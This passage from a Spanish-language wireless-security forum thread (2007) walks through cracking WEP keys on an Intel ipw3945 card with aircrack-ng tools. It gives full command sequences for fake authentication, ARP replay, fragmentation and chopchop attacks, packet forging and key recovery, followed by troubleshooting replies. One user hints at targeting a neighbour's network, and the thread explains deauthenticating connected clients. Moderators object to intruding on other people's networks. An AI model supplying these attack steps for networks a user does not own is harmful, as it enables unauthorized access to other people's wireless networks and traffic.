canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)

6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap

esto aparece
allocating a new table
bssid = xx:01  (mia)     keyindex=0
allocating a new table
bssid = xx:02               keyindex=0
allocating a new table
bssid = xx:03               keyindex=0
stats for bssid xx:01  keyindex =0 packects=1155
stats for bssid xx:02  keyindex =0 packects=34
stats for bssid xx:03  keyindex =0 packects=1

Aparentemente esto esta correcto, solo comprueba una cosa, si hal cambiar el rate canal y demas estos estan cambiados correctamente
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: mc_abel en 31-05-2007, 19:35 (Jueves)
Antes que nada gracias a los que han puesto tiempo en darle soporte a wifi way wifislax y de alguna forma contribulleron a los manuales hallados en estos foros.

Los manuales estan muy buenos pero en mi caso ocurrio algo interesante que me hizo la vida imposible al intentar conseguir un WEP key:  no habian clientes conectados y aun con la falsa autenticacion no subian los ARP.  Pongo esto aqui por si alguien le ocurre lo mismo.  Lo que pongo a continuacion es una aplicacion/remix del conocimiento posteado aqui y otras web y para algunos os parecera obvio;  pero tiene algunos pasos extra para los que tengan mi problema de falta de injeccion.  Mi OS es WIN XP y uso live CD.  Asumo que el AP tiene WEP open y vosotros usuais tarjeta wifi ipw3945 :-P.

Primeramente, utilize la version 0.4 de wifiway.  la 0.6 salio JUSTO cuando acababa de bajar la 0.4 se me acabaron los discos en blanco para colmo>.>

NOTA:yo me mate buscando info por ahi y luego me entero que en esta live CD NO HAY QUE PONER LA TARJETA EN MODO MONITOR.  Se hace automaticamente.

En la version 0.6 imagino que los primeros 3 pasos no se necesitan(excepto poner el live cd DUH :-P).

I.  Desde windows correr netstumbler.  Es super rapido y dummy friendly para hallar AP's y BSSID's.  Es mi preferencia, si no os gusta usad lo que querais y pasad trabajo :-).

II.  Poner ipw3945.sh en el directorio raiz, usualmente C.  Poner live CD y dar restart.

III. Una vez en linux abrir el explorador de archivos y buscar el folder /mnt/ y una de esas va a ser la particion de windows.  Dar copy al ipw3945.sh y paste en /root.

->NOTA: talvez muchos sepan esto pero yo no hasta hace un dia, asi que aqui os va: en el folder /mnt/ pueden haber varias particiones (incluyendo USB drives me imagino). En mi caso puedo dar copy a cosas de windows pero no puedo paste cosas de linux a esa particion.  Si han comenzado el proceso de obtener IV's y se han quedado a mitad pueden darle copy a los .cap y .ivs y otras cosas que hayan creado en linux a uno de esas particiones.  Ademas pueden grabar desde windows los tutoriales con "save as web page," abrir firefox, arrastralos a la ventana y verlos desde linux.

IV.  Abrir un terminal y escribir chmod 777 ipw3945.sh <dar enter> luego escriba ./ipw3945.sh y ponga la info que le pida.



V.  Escriba en la consola:
Código: [Seleccionar]
aireplay-ng -1 0 -e NOMBRE_DEL_AP  -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
O si esto no trabaja bien
Código: [Seleccionar]
aireplay-ng -1 6000 -o 1 -q 10 -e NOMBRE_DEL_AP  -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
-Vuestro MAC se consigue  escribiendo en un terminal  /ifconfig -a
-Este ataque puede fallar de la primera asi que intente varias veces. En mi caso falla si hay un cliente externo conectado.  Aveces un buen reboot a tu maquina ayuda si no funciona.

VI.  en otra consola:
Código: [Seleccionar]
airodump-ng -w  --ivs cap rtap0 -Cap es el nombre que prefieran para guardar data capturada

VII. en otra consola:
Código: [Seleccionar]
  aireplay-ng -3  -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0   Con solo esto puede que le injecte.  Ese no fue mi caso asi por eso viene lo siguiente:

VIII.  Este paso puede ser hecho de la forma A o B.  Aun con el mismo AP aveces funciona el A aveces el B.  Usad uno de los dos si AL FINAL no trabaja, dar reboot y use el otro(el reboot es pq despues del procedimiento los drivers aveces no responden como uno quiere y no ataca bien)  :

A.  En otra consola:
Código: [Seleccionar]
aireplay-ng -5  -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0  -ESPERE un par de minutos a que esto termine.  Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor  ->Apunte el nombre

B.   En otra consola EN LUGAR del paso A:
Código: [Seleccionar]
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA   -este ataque aveces no funciona con el -h.  Usted experimente.
-ESPERE un par de minutos a que esto termine.  Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor  ->Apunte el nombre

>Anotar de estos pasos nombre de archivo con nombres de este tipo: replayX.cap la parte de X usualmente es un numero.  Sustituyalo por el que aplique a su caso
>Una ALTERNATIVA al VIIIB si ya tiene un archivo replay*.cap de una ocacion anterior es
Código: [Seleccionar]
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA  -r replayX.cap -donde X son unos numeros.  Sustituyalo de acuerdo a su caso.


IX.  en otra consola:
Código: [Seleccionar]
packetforge-ng -0   -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA -k 255.255.255.255 -l 255.255.255.255 -y fragmentX.xor  arpZ   >la x puede ser cualquier cosa fijarse en los archivos creados por el paso anterior
> esto es una L minuscula no e confundan-l
> arpZ puede ser lo que quieran, pero no olviden el nombre
>los ip que se muestran NO LOS CAMBIEN; la mayoria de los AP no tienen problema con ellos

X. Presionar las teclas ctrl  C en la consola que tiene corriendo al airodump(amenos que usted vea que le esta injectando pero los dudo).  Ejecute este nuevo comando:
Código: [Seleccionar]
airodump-ng -c X -bssid MAC_DEL_AP --ivs -w capture rtap0 >el nombre capture lo escojen ustedes pero capture suena bien :P

XI.  En otra consola (use la que corri el ataque -1, que estaba abierta) escriba:
Código: [Seleccionar]
aireplay-ng -2  -r arpZ TARRJETA wifi0 
>la ventana del paso VII debe estar mostrando como suben los ARP, en mi caso promedio de 400 data/segundo :-D, si no es asi recomiendodar reboot e intentar denuevo sustituyendo el paso VIII A por el B o viceversa o tratar luego.  Esto a mi NO me funciona si hay algun cliente conectado aparte del fake auth del ataque -1.  Un ataque -0 os puede da~ar el procedimiento asi que no lo hagais :-P.

XII.  ejecuten en otra consola:
Código: [Seleccionar]
aircrack-ng *.cap  X.ivs -b MAC_DEL_AP > -b MAC_DEL_AP no es necesariopero aveces no me funciona sin el :-S
>la parte de *.cap la poneis tal como esta con el * per el X.ivs depende del el o los archivos que crearonen los pasos anteriores.  Ademas el sistema cambia los nombres, usualmente capture se va a llamar capture-01.ivs o algo asi.  Por eso recomiendo ir al /root y ver todos los archivos nombrados <lo que sea>.IVS y a~adirlo al codigo en lugar de X.ivs.  Cabe notar que si hay mas de 1 pueden poner todos losque quieran ej X.ivs y.ivs z.ivs pero no acepta *.ivs a diferencia del *.cap que si lo acepta
>si han hecho todo bien al aircrack le deben estar subiendo los IV a monton, asi que esperad, Yo necesite 700,000 IV's y el WEP key era solo de 64 bit y tardo 10 minutos en colectarlos, asi que no se desesperen.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: ruitino en 03-06-2007, 13:25 (Domingo)
Porque no conseguo la autenticacion con el BSSID?
Título: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 04-06-2007, 10:10 (Lunes)
no lo logro....como puedo hacer eso q dices para comprobar el rate, canal y demas. Y sobre todo en q paso. perdona pero estoy desesperado.


salu2.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: alberion en 07-06-2007, 02:50 (Jueves)
excelente manual, ahora nada mas falta crear un isntalador de wifiway para que no se use siempre como live cd :P

saludos y rgacias por tal regalo! ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 08-06-2007, 00:58 (Viernes)
alberion. Bueno se hace todo lo posible ;D ;D

kuasha. Para comprobar el rate, bssid y chabnnel entras en la carpeta

/sys/class/net/wifi0/device

Y ahi lo puedes ver
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: cracky_n_1988 en 29-06-2007, 20:54 (Viernes)
Buenas a todos, queria hacer una pregunta:

Me he dispuesto a empaparme de información acerca de todo esto, ya entiendo perfectamente todos los comandos y demas, me dispongo a coger mi router, ponerle un password (el cual yo se) en intento desde el portatil con la tarjeta 3945abg desencrptarla, pero e seguido al milimetro el videomanual de hadrianweb y nada, no me captura ningun arp, si sirve de algo he usado el script envia un monton de bracom (perdonad si no lo escribo bien esque de memoria no se) y lo he dejado una hora y media y nada no sube nada,

p.d.: el portatil esta a 1metro del router.
¿que puedo hacer? hecharme una mano, se me olvidaba al router lo inyecto ya que nadie ay conectado a esa red inalambrica, muchas gracias de antemano y un saludo, espero respuestas.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 30-06-2007, 15:29 (Sábado)
Como ya hemos dicho muchas veces, quizas el problema no sea tuyo, cada router es un mundo.

Comprueba que te autentificas, ya que sino mal vamos, luego recuerda bajar el rate
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: the_often en 01-07-2007, 04:55 (Domingo)
Para hacerlo mas rapido, si puedes pon otro PC a navegar por internet.  Asi ya tendrás un cliente conectado y asi la cosa suele ser mucho mas rapida.


Saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: cracky_n_1988 en 01-07-2007, 22:23 (Domingo)
el rate lo bajo a 2, sip lo de autentication full me sale bien, es decir, sucefull o algo asi, el otro lo tengo con la mula puesta pero como no conecta a traves de wireless que va por cable no se eso valdra para algo, solo queria hacer la prueba con mi router aver si yo savia o no savia, jeje me tocara ir a buscar una inalambrica por aqui cerca. eneis alguna otra cosa que pueda ser? un saludo y gracias
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: the_often en 01-07-2007, 22:34 (Domingo)
El otro PC que conectes a internet  tiene que ser de forma inalambrica. Por cable no te valdrá.

Debes saber que aquí no apoyamos el entrar en redes ajenas.


Saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: cracky_n_1988 en 02-07-2007, 16:47 (Lunes)
no estoy entrando en una red ajena, es mi propia red, que tengo un sobremesa y un portatil lo que pasa que en el sobremesa no tengo red inalambrica, va por cable. si alguien lee el post que me heche una mano si puede gracias.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: the_often en 02-07-2007, 16:54 (Lunes)
Ya sé que era con tu propio router hombre.  Yo lo decia por esto, nada mas:

Citar
me tocara ir a buscar una inalambrica por aqui cerca.


Un saludo :)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: cracky_n_1988 en 03-07-2007, 12:34 (Martes)
me refiero a la de algun amigo saviendolo el xD jeje
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: skyman87 en 08-09-2007, 00:43 (Sábado)
Ola a todos.

Lo primero de todo es daros las gracias por todos los manuales, videos y respuestas que dais ayudando a tanta gente... Pero aora soy yo el que precisa de vuestra ayuda...

Tengo una problema y es el siguiente: usando el Live Cd del Wifiway 0.6 y tras lograr que aparezca esa frase que tanto nos llena de alegria a todos: "key found whith leng ..." pues no logro encontrar su equivalente en Ascii ya que lo que me muestra la pantalla es lo siguiente: "key found whith leng 05: B1 XX XX XX XX" ; no logro encontrar su equivalencia en Ascii, ese es el problema... No se si es problema de la encriptacion, de la contraseña o si esta parcheada contra ataques o cualquier cosa...

No creo que tenga mucha importancia pero mi tarjeta es la ipw3945...

Agradeceria cualquier tipo de ayuda o comentario... Muchas gracias de antemano, seguir asi.

------------------------

Como bien te dice indio99, por favor no postes la key  ;)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: pianista en 08-09-2007, 02:28 (Sábado)
Puedes meter esa clave tan pancho...
Si la quieres en ascii en seguridadwireless.net, tienes en herramientas un conversor de hexa a ascii...
Saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: indio99 en 08-09-2007, 03:40 (Sábado)
please skyman87, no postees claves descifradas, macs ni nada parecido please.

en cuanto a tu cuestion, puede que simplemente no exista la equivalente en ascii, debido a que por ejemplo la clave se haya creado directamente en hexadecimal, me explico

una clave ascii tiene equivalente hexadecimal
pero una clave hexadecimal, no tiene porqué tener una equivalente ascii

por lo que si vas a trabajar normalmente en guin, introduce la clave directamente (dos veces) indistintamente si es ascii (muy importante distinguir entre mayusculas y minusculas) o hexadecimal (sin dos puntos ni separacion, todo junto) segun sea tu caso, el guin te le detecta automaticamente.

saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: skyman87 en 08-09-2007, 15:31 (Sábado)
No lo habia pensado pero muchas gracias, es que segui el excelente video manual de hadrianweb (que por cierto muchas gracias por molestarte en hacerlo) y no me di cuenta de que en efecto la clave ya estaba en Ascii... Muchas gracias por la ayuda de veras...

Siento haber dado los datos pero era la unica forma en la que yo pensaba me podriais ayudar, no se volvera a repetir...

Gracias
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 08-09-2007, 16:14 (Sábado)
Anda, pues veo que al final resulto util estar un fin de semana entero con el video  ;D ;D ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: mullen en 09-09-2007, 01:46 (Domingo)
A ver si alguien me puede ayudar a mi con esto, que soy bastante noob  :-[
Estoy tratando de aprender sobre seguridad wireless y wifiway me pareció interesante (tengo una ipw3945), el caso es que seguí paso a paso este manual, con la versión 0.8 de wifiway, pero tengo un problema.

En el momento de autentificarse, me salía el intento de autentificación y el pc se me quedaba colgado. Probé instalando wifiway en mi disco duro pero la cosa seguía igual, luego, tras probar con el script ipw3945.sh he conseguido que la primera autentificación me de sucessful, pero luego se me queda colgado otra vez, y nunca llego a ver la carita.

¿Qué estoy haciendo mal?  :(


Un  saludo!
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 09-09-2007, 02:06 (Domingo)
Pues lo que estas haciendo mal, no lo se, ya que no nos has indicado los comandos utilizados, pero una sugerencia si te puedo dar, si utilizas wifiway 0.8 puedes ejecutar desde la shell airoway.sh, que es un proces que ya hace la auenticiacion con el ap deseado y tambien realiza el ataque
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: noisivm en 05-10-2007, 17:56 (Viernes)
Buenas tardes a todos !!!

Estoy intentado inyectar a una ipw3945 con el wifiway versión 0.8 y creo que no me reconoce mi tarjeta de red en la terminal he puesto iwconfig y me aparece esto:

lo        no wireless extensions

eth0     no wireless extensions

wifi0     unassociated   ESSID:off/any
           Mode:Monitor   Channnel=6  bit Rate=1 MB/S


rtap0    no wireless extensions

eth1     no wireless extensions

Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: indio99 en 05-10-2007, 22:35 (Viernes)
Buenas tardes a todos !!!

Estoy intentado inyectar a una ipw3945 con el wifiway versión 0.8 y creo que no me reconoce mi tarjeta de red en la terminal he puesto iwconfig y me aparece esto:

lo        no wireless extensions

eth0     no wireless extensions

wifi0     unassociated   ESSID:off/any
           Mode:Monitor   Channnel=6  bit Rate=1 MB/S


rtap0    no wireless extensions

eth1     no wireless extensions



que no te la reconoce ??? ??? ??? ??? ??? ??? ??? ??? ???

claro que te la reconoce, además está cargada con los drivers para inyección.

saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 06-10-2007, 10:41 (Sábado)
Mira simplemente tienes que poner en una shell

airoway.sh

Y ya estaras capturando e inyectando si quieres  ;D ;D ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: noisivm en 06-10-2007, 13:47 (Sábado)
pues si es cierto esta activada en modo monitor  ;D ;D

estoy ahora  utilizando el airoway.sh y capturando pero que mas tengo que hacer y cuando

como podría hacer capturas del proceso?

pd...perdón por dar la brasa pero soy muy novato

Salu2 :)


Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: indio99 en 06-10-2007, 14:22 (Sábado)
lee el manual de fragmentación con airoway, creado por juanjetomas

lee las chinchetas que veas, yo puedo decirte los pasos para capturar he inyectar, pero es que eso se ha dicho muchas veces, lee y te enteraras de eso y de muchísimas otras cosas interesantes.

usa la opción buscar, y creeme, aprenderás mucho más, si no sólo sabrás hacer eso, y no sabrás el por que se hace ni nada.

otra cosa, es que después de haber leido el manual, se te presente alguna duda, entonces encantados, tanto yo como mis compañeros en resolvertela.

capturas del proceso, simplemente usando el botón Impr Pt, que por lo general se encuentra cerca de la tecla retroceso (en el teclado).


saludos.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: noisivm en 06-10-2007, 21:52 (Sábado)
Indio99 me he leído el manual que dijiste y me ha ido muy bien probando varias veces cambiando de menos a mas mi clave del AP,

-aunque he podido, hay cosas que aun no cuadran:

1ª la 3 opción que  sale en el menú no he visto en el manual que comentas para que sirve ni la he utilizado

2ª la opción 4 no se si entiendo bien sirve para cuando un AP esta a la vista hay que utilizarlo y cuando esta oculto no

3ª el chop-chop no se la utilidad en el manual no aparece nada sobre uso

otra de las dudas para la WPA que según he podido leer hace falta 1 hadshake ???

y para terminar mi consulta y perdonar por pesao jejeje...... en mi pc de sobremesa que tiene la rtl8187 al arrancar el cd-live tanto del wifiway o del wifislax me da un error y no me entra en el sistema



Salu2.................Thank you very much  ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: indio99 en 06-10-2007, 23:46 (Sábado)
Citar
y para terminar mi consulta y perdonar por pesao jejeje...... en mi pc de sobremesa que tiene la rtl8187 al arrancar el cd-live tanto del wifiway o del wifislax me da un error y no me entra en el sistema

deberás ser más explicito, y especificar que error es el que te da, dinos cual es el error, porque entende que puede haber mil errores posibles.

El ataque chopchop, hasta hoy no he escuchado a nadie, que lo haya conseguido con la ipw3945

La opción tres, es para realizar un ataque normal de inyección (sin fragmentación)

puedes hacer tu tus propias pruebas, pero desde que usé la primera vez la fragmentación con la ipw3945, no he echo otra.

y ya sabes, cuando puedas y tengas tiempo, leete algunas chinchetas que veas por ahí, y veras como le cojes rápido el rollo a ésto.

PD: la opción cuatro, ahora mismo no se cual es, ya que uso ubuntu, y tendría que reiniciar ahora para verlo.

saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: noisivm en 07-10-2007, 20:30 (Domingo)
pues bien he intentado hacer una captura del arranque del live-cd y como no he podido he tenido que hacer unas fotos

Esto es lo que me pone en el arranque tanto del wifislax y wifiway:

(http://img114.imageshack.us/img114/743/dsc02070640x480lu9.jpg)

los ataques 3 y chop-chop los he probado y todo ok

y la opción 4 es la que dice que pulse si hay cliente para la desconexion (no entiendo su significado)


Salu2
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: indio99 en 07-10-2007, 20:37 (Domingo)
vale, la opción cuatro es para eso, para expulsar a un cliente que está conectado, para así forzarlo a asociarse de nuevo, y en esa autentificación, poder capturar unos ARP bastante importantes.

por el error de pantalla, no puedo echarte un cable, quizas otro compañero pueda hacerlo.

saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: noisivm en 07-10-2007, 20:53 (Domingo)
vale, la opción cuatro es para eso, para expulsar a un cliente que está conectado, para así forzarlo a asociarse de nuevo, y en esa autentificación, poder capturar unos ARP bastante importantes.

por el error de pantalla, no puedo echarte un cable, quizas otro compañero pueda hacerlo.

saludos

ok gracias Indio99 !!! ;)

haber si alguien entiende el porque del fallo al arrancar,al parecer se trata de algún dispositivo HD o algo parecido


Salu2
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: noisivm en 08-10-2007, 21:35 (Lunes)
Un poco extraño pero al final si que funciona, solo que tengo que esperar unos 7 min para que haga la carga en cualquiera de los 2 live-cd


pd.....Indio99 si ves este mensaje muchas gracias por la ayuda  ;)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: MeRc en 09-11-2007, 21:20 (Viernes)
una pregunta, si al snifar la red con aerodump no me aparece a la mac una STATION, no puedo realizar el ataque?

segun leo por aqui creo q no, y mi compi tiene el ordenador conectado al router via cable, por ello dedusco que no me aparece la station asociada.

pues eso que estamos aki los dos mirando el portatil esperando la subida de los ARP, lleva 18000 paquetes y no suben.

gracias!
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: ChimoC en 10-11-2007, 09:58 (Sábado)
BUenas:

Si no hay nadie conectado vía wifi... pues te tocará hacer otro tipo de ataque (un A3 puro no te vale)

Un saludo

ChimoC
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: jonathan2908 en 12-11-2007, 01:39 (Lunes)
hola.

1. Ya busque lei y creo que toy dando vueltas en circulo.
En la carpeta sys/class/net/io (no hay mas carpetas)
Tengo un wifiway 0.8,:Inicio con startx,
Luego en consola iwconfig
lo no wireless extensions.
iwconfig rtap0 , wifi 0.

Nada ley que habian manuales que te ayudaban a iniciar tu tarjeta correctamente, pero naka la pirinaka, si me pueden dar alguna ayuda, con esto es una Hp Dv6000(series) ipw3945. (algun enlace porque ya me hice bolas con la busqueda)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: buster24 en 14-11-2007, 17:17 (Miércoles)
yo lo e hecho y e obtenido la siguiente clave en hexadecimal (NO_SE_PONEN_CLAVES) ahora resulta que la voy a meter en windows y me la pide en otro codigo de numeracion que supongo que es ascii. pues bien la e pasao a este codigo mediante corversores existentes y me han salido unos simbolos muy raros). bien que puedo hacer? Hay alguna forma de pasarlo aun codigo que sirva para windows? seria alguien capaz de hacerlo con esa wep key? os lo agradeceria muxo. espero respuestas por favor.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: ChimoC en 14-11-2007, 18:40 (Miércoles)
Buenas:

Buster24... si no es tu red ...... https://foro.seguridadwireless.net/index.php/topic,6093.0.html

jonathan2908... porque no utilizas el airoway.sh..... que es para las ipw3945 (creo que en el apartado del foro de Wifiway 0.8 hay un link de descarga )

Un saludo

ChimoC
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: MeRc en 15-11-2007, 00:18 (Jueves)
aver realizando A1 y A3 consigo pillar 19200 ARP y 22000 DATAS.

dejo corriendo el aerodump mientras meto el aircrack, y me dice el aerodump un error de que no guarda ams porque no tengo sitio en el disco duro, e de decir que fisicamente hay sitio de sobra, lo que nose es lo que me reconoce el wifislax. el archivo cap me ocupaba 100MB y ya no aumentaba mas.

aun asi deje el aircrack aver que hacia y lo he parado tras 9h sin resultado.

me podeis iluminar?

1000 gracias!
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 15-11-2007, 00:19 (Jueves)
Desde live cd, o instalado en el hd???
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: MeRc en 15-11-2007, 10:30 (Jueves)
desde el live cd
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 15-11-2007, 14:59 (Jueves)
Eso es posible que sea por la ram, aun asi pues guardar varios archivos .cap, y luego ejecutarlos todos juntos con el aircrack
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: MeRc en 15-11-2007, 15:10 (Jueves)
pues tengo 2GB de ram.

y como hago lo de guardar en varios cap sin cortar el airodump?
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 15-11-2007, 15:17 (Jueves)
A ver pero cortas el airodump, y guardas el archivo por ejemplo en eun usb, luego vulve a ejecutarlo, y una vez tengas todos los archivos con los datas suficientes, pues haces lo siguiente para aircrack

Código: [Seleccionar]
aircrack-ng -z  *.cap
Recuerda que tienes que estar en el mismo dir que los archivos, y si no estas pues pones lo siguiente y punto

Código: [Seleccionar]
aircrack-ng -z /directorio/*.cap
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: MeRc en 15-11-2007, 19:16 (Jueves)
weno y si yo paro el airodump y luego lo vuelvo a ejecutar, no empieza desde el principio?

otra duda, estoy leyendo lo de o pillar cap o ivs, y que son diferentes.

yo utilizo el A1 y A3 y pilla cap, por lo que se ve con lo que pillo 19200 ARP y 22000 DATAS no seran suficientes cuando despues de 9h no me saco la clave, me ira mejor con ivs? como lo hago?

espero no desesperar a nadie.

GRACIAS!!
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 15-11-2007, 20:09 (Jueves)
Primero a cada captura del airodump le puede poner un nombre con la opcion -w, por ejemplo

Código: [Seleccionar]
airodump-ng -w mired1.cap wifi0
Segundo, para utilizar aircrack de la forma mas rapida es decir con la opcion de -z, es preciso que utilices los cap, ya que con el otro no tira, u eso creo.

Tercero, a veces con 50000datas es suficiente pero otras tienes que espara hasta 80000 o quizas mas
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: dexter_jj en 16-11-2007, 01:40 (Viernes)
hola que tal
resulta que tengo un pequeño problema al intentar inyectar trafico con el driver ipw3945, tengo una dell inspiron 640m, y la interfaz que usa para la wifi es eth1, he tratado de usar el wifiway, pero resulta que hay que modificar un trio de archivos, que no existen en mi computadora ahí les dejo los archivos, si alguno de ustedes puede ayudarme con esto, les agradecería.

# chmod 777 ipw3945.sh
# ./ipw3945.sh

                                                 
*************************************************
Script para la inyeccion de la ipw3945           
*************************************************
Disenado y desarrollado por seguridadwireless.net
*************************************************
                                                 
Por favor introduce el canal para la wifi0
6
Indique el rate de captura
2
Indique el bssid para el asociado, separado por puntos (Ej: 00:11:22:33:44:55)
00:1D:5A:2F:03:A9
wifi0: ERROR mientras se obtenian las banderas de interfaz: No existe el dispositivo
chmod: no se puede acceder a `/sys/class/net/wifi0/device/rate': No existe el fichero ó directorio
./ipw3945.sh: line 20: /sys/class/net/wifi0/device/rate: No existe el fichero ó directorio
./ipw3945.sh: line 21: /sys/class/net/wifi0/device/channel: No existe el fichero ó directorio
./ipw3945.sh: line 22: /sys/class/net/wifi0/device/bssid: No existe el fichero ó directorio
wifi0: ERROR mientras se obtenian las banderas de interfaz: No existe el dispositivo
                                                 
*************************************************
Si se le ha comunicado algun error en el apartado anterior, pues repita el proceso
Si se repite el error comuniquesnolo en el foro de seguridadwireless.net
************************************************* ;D ;D >:( >:( :( :( ??? ??? ??? ??? ??? ::) ::) ::) ::) :-X :-X :'( :'(
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 16-11-2007, 01:53 (Viernes)
Con la nueva wifiway no es necesairio cambiar el canal de esa forma, aun asi asegurate de que al hacer iwconfig te sale la interfaz wifi0


Nota: Puedes utilizar airoway
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: dexter_jj en 16-11-2007, 04:00 (Viernes)
Hola antes que nada, y de antemano quiero ofrecer una disculpa por escribir el mismo tema en dos lugares.
Cuando ejecuto iwconfig, no me aparece wifi0, me aparecen las interfaces:
lo
eth0
eth1
Y la única que puedo ejecutar en modo monitor es eth1, además que que lo y eth0 no son extenciones wireless. Esto es lo que aparece:
~$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      unassociated  ESSID:off/any 
          Mode:Managed  Frequency=nan kHz  Access Point: Not-Associated   
          Bit Rate:0 kb/s   Tx-Power:16 dBm   
          Retry limit:15   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:2   Missed beacon:0
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 16-11-2007, 12:00 (Viernes)
Muy extraño, has probado a inyectar utilizando esa???

Una pregunta estas seguro de que es la ipw3945 y no la ipw4935??
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: dexter_jj en 17-11-2007, 05:18 (Sábado)
Hola que tal Agradezco siempre su pronta contestación.
A lo que tan seguro estoy de que es la ipw3945, bueno, estoy tan seguro de que es, asi como me llamo. He intentado todo, e inyectar es imposible. Tambien he intentado cambiar el driver en mi sistema operativo (mandriva debian ubuntu ... parece que son todos los s.o. que he usado)por algún otro parchado, y el resultado es catastrófico, porque!, muy sencillo, se desinstalan mis drivers e instalar los nuevos es imposible. Ojo estoy ahorita tratando con airoway y es ese ahora mi problema.
Por su atencion Mr. hadrianweb, mil gracias
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 21-11-2007, 13:40 (Miércoles)
En primer luegar perdona por la tardanza en responder, y segundo , has ejecutado el script de inyeccion???, para inyectar tienes que hacerlo y para conectarte ejecutar, el otro, y eso es porque para conexion utiliza un driver y para la inyeccion utiliza otro
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 22-11-2007, 13:16 (Jueves)
Bueno en primer luegar la autentificacion no puede hacerse si el ap al que intentas autentificar esta muy lejos, es decir si tienes señal baja, tambien hay que tener en cuenta que muchas veces tambien depende del ap.

Y en segundo luegar, que reinicie el ordenador quien???

Si quieres reiniciar tanto en wifislax como en wifiway lo puedes hacer con el comando reboot
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 23-11-2007, 15:05 (Viernes)
Calidad de la señal, desde win con el netstumbler, y en wifislax simplemente haz el iwlist scan, pero deberas tener la tarjeta en modo conexion.

No hay un minimo ni un maximo pero es (muy) recomendable que lo hagas con buena calidad sino podria no funcionar.

Hay algunos routers (o AP´s) que son mas vulnerable que otros por eso digo que puede depender del AP
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 24-11-2007, 17:44 (Sábado)
Prueba con comados a mi a veces con comandos me asocia y con airoway no me asocia, sera por el rate o alguna cosa de esas pero a veces pasa.

A la pregunta de recomendacion de usb, en estos momentos tengo mucha informacion en la cabeza, pero sino me equivoco creo que la mejor era la alfa, con chip realtek, aunque yo no la tengo, solo te digo que la edimax aunque tiene buena recepcion tarda en coger arp, y ademas por veces tarda demasiado
Título: Re: Video + Manual: Inyeccion ipw3945
